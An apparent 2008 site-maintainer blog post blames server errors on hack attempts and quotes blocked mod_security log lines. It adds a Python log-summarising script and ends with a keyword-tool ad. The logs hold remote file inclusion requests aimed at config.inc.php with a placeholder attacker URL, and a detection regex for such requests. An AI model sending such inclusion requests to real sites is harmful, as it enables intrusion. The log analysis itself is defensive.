Archive for January, 2008

The reason for all those 500 errors…

We are being flooded by hack attempts. Here is an excerpt of the access logs:

[Mon Jan 7 09:18:06 2008] [error] [client 69.93.20.XXX] mod_security: Access denied with code 503. Pattern match “=(\\\\.\\\\.|http|https|ftp)\\\\:” at REQUEST_URI [id “HG2007072020″][rev “1″] [msg “HG: libwww UA with RFI”] [severity “NOTICE”] [hostname “getyacg.com“] [uri “/support///config.inc.php?path_escape//////config.inc.php?path_escape=SOMEHACKERURL”]
[Mon Jan 7 09:18:06 2008] [error] [client 69.93.20.XXX] mod_security: Access denied with code 503. Pattern match “=(\\\\.\\\\.|http|https|ftp)\\\\:” at REQUEST_URI [id “HG2007072020″][rev “1″] [msg “HG: libwww UA with RFI”] [severity “NOTICE”] [hostname “getyacg.com“] [uri “///config.inc.php?path_escape//////config.inc.php?path_escape=SOMEHACKERURL”]
[Mon Jan 7 09:18:23 2008] [error] [client 69.93.20.XXX] mod_security: Access denied with code 503. Pattern match “=(\\\\.\\\\.|http|https|ftp)\\\\:” at REQUEST_URI [id “HG2007072020″][rev “1″] [msg “HG: libwww UA with RFI”] [severity “NOTICE”] [hostname “getyacg.com“] [uri “/support///config.inc.php?path_escape//////config.inc.php?path_escape=SOMEHACKERURL”]
[Mon Jan 7 09:18:23 2008] [error] [client 69.93.20.XXX] mod_security: Access denied with code 503. Pattern match “=(\\\\.\\\\.|http|https|ftp)\\\\:” at REQUEST_URI [id “HG2007072020″][rev “1″] [msg “HG: libwww UA with RFI”] [severity “NOTICE”] [hostname “getyacg.com“] [uri “///config.inc.php?path_escape//////config.inc.php?path_escape=SOMEHACKERURL”]
[Mon Jan 7 09:30:39 2008] [error] [client 69.93.20.XXX] mod_security: Access denied with code 503. Pattern match “=(\\\\.\\\\.|http|https|ftp)\\\\:” at REQUEST_URI [id “HG2007072020″][rev “1″] [msg “HG: libwww UA with RFI”] [severity “NOTICE”] [hostname “getyacg.com“] [uri “/support///config.inc.php?path_escape//////config.inc.php?path_escape=SOMEHACKERURL”]
[Mon Jan 7 09:30:39 2008] [error] [client 69.93.20.XXX] mod_security: Access denied with code 503. Pattern match “=(\\\\.\\\\.|http|https|ftp)\\\\:” at REQUEST_URI [id “HG2007072020″][rev “1″] [msg “HG: libwww UA with RFI”] [severity “NOTICE”] [hostname “getyacg.com“] [uri “///config.inc.php?path_escape//////config.inc.php?path_escape=SOMEHACKERURL”]

It’s all coming from the same host, and I have a pretty good idea of what they are attempting… But I’m not sure if it’s an automated attack and I’m a random victim or it’s a personal attack against [YACG].

I will take care of this ASAP and let you guys know what this is all about…
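To check the "same host" observation across a whole log rather than by eye, here is an added example (not part of the original post) that parses mod_security denial lines in the format shown above and groups them by client, rule id and normalised script path. The sample lines, IP addresses, hostname, parameter values and the rule id EXAMPLE0001 are constructed; only the line format and the id HG2007072020 come from the excerpt.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime

# Constructed sample in the excerpt's format (documentation IPs, placeholder host/values, invented second rule id).
SAMPLE_LOG = r"""
[Mon Jan 7 09:18:06 2008] [error] [client 192.0.2.10] mod_security: Access denied with code 503. Pattern match "=(\.\.|http|https|ftp)\:" at REQUEST_URI [id "HG2007072020"][rev "1"] [msg "HG: libwww UA with RFI"] [severity "NOTICE"] [hostname "example.org"] [uri "/support///config.inc.php?path_escape=PLACEHOLDER"]
[Mon Jan 7 09:18:06 2008] [error] [client 192.0.2.10] mod_security: Access denied with code 503. Pattern match "=(\.\.|http|https|ftp)\:" at REQUEST_URI [id "HG2007072020"][rev "1"] [msg "HG: libwww UA with RFI"] [severity "NOTICE"] [hostname "example.org"] [uri "///config.inc.php?path_escape=PLACEHOLDER"]
[Mon Jan 7 09:30:39 2008] [error] [client 192.0.2.10] mod_security: Access denied with code 503. Pattern match "=(\.\.|http|https|ftp)\:" at REQUEST_URI [id "HG2007072020"][rev "1"] [msg "HG: libwww UA with RFI"] [severity "NOTICE"] [hostname "example.org"] [uri "/support///config.inc.php?path_escape=PLACEHOLDER"]
[Mon Jan 7 09:30:39 2008] [error] [client 192.0.2.10] mod_security: Access denied with code 503. Pattern match "=(\.\.|http|https|ftp)\:" at REQUEST_URI [id "HG2007072020"][rev "1"] [msg "HG: libwww UA with RFI"] [severity "NOTICE"] [hostname "example.org"] [uri "///config.inc.php?path_escape=PLACEHOLDER"]
[Mon Jan 7 09:41:12 2008] [error] [client 198.51.100.7] mod_security: Access denied with code 503. Pattern match "PLACEHOLDER" at REQUEST_URI [id "EXAMPLE0001"][rev "1"] [msg "constructed rule"] [severity "NOTICE"] [hostname "example.org"] [uri "/index.php?page=PLACEHOLDER"]
"""

HEAD = re.compile(r"^\[([^\]]+)\] \[error\] \[client ([^\]]+)\] mod_security: Access denied with code (\d+)")
FIELD = re.compile(r'\[(id|msg|hostname|uri) "([^"]*)"\]')
QUOTES = str.maketrans({"\u201c": '"', "\u201d": '"', "\u2033": '"'})  # undo blog-mangled quotes

def parse_line(line):
    """Return one denial event as a dict, or None for unrelated lines."""
    line = line.translate(QUOTES)
    head = HEAD.match(line)
    if not head:
        return None
    event = dict(FIELD.findall(line))
    event["time"] = datetime.strptime(head.group(1), "%a %b %d %H:%M:%S %Y")
    event["client"], event["status"] = head.group(2), int(head.group(3))
    # Collapse repeated slashes and drop the query to see which script is targeted.
    event["path"] = re.sub(r"/+", "/", event.get("uri", "").split("?")[0])
    return event

def summarise(log_text):
    """Group denials by client: hit count, rule ids, target paths, timestamps."""
    summary = defaultdict(lambda: {"hits": 0, "rules": Counter(), "paths": set(), "times": []})
    for event in filter(None, map(parse_line, log_text.splitlines())):
        entry = summary[event["client"]]
        entry["hits"] += 1
        entry["rules"][event.get("id", "?")] += 1
        entry["paths"].add(event["path"])
        entry["times"].append(event["time"])
    return dict(summary)

def dominant_client(summary):
    """Return (client, share of all denials) for the noisiest source."""
    total = sum(entry["hits"] for entry in summary.values())
    client = max(summary, key=lambda c: summary[c]["hits"])
    return client, summary[client]["hits"] / total

if __name__ == "__main__":
    print(dominant_client(summarise(SAMPLE_LOG)))
```

One client producing most of the denials against the same script name under several directory prefixes is the pattern visible in the excerpt; the per-client timestamps show how the requests are spaced.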

Need keywords for your [YACG] sites? Free Keyword Tool

If you need keywords for your [YACG] sites, you might want to check this out.

http://busin3ss.name/free-keyword-tool

Have fun!